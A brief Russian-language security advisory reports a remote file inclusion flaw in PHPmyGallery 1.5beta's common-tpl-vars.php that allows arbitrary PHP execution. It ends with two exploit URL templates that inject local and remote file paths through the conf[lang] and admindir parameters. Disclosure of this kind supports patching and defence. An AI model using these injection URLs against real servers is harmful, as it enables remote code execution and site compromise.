Программа: PHPmyGallery 1.5beta
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных сценарием common-tpl-vars.php. Удаленный пользователь может
выполнить произвольный PHP сценарий на целевой системе с привилегиями Web
сервера.
Эксплоит:
http://localhost/[PATH]/_conf/_php-core/common-tpl-vars.php?conf[lang]= [LF?]
(Windows Only)
http://localhost/[PATH]/_conf/_php-core/common-tpl-vars.php?admindir=[RFI]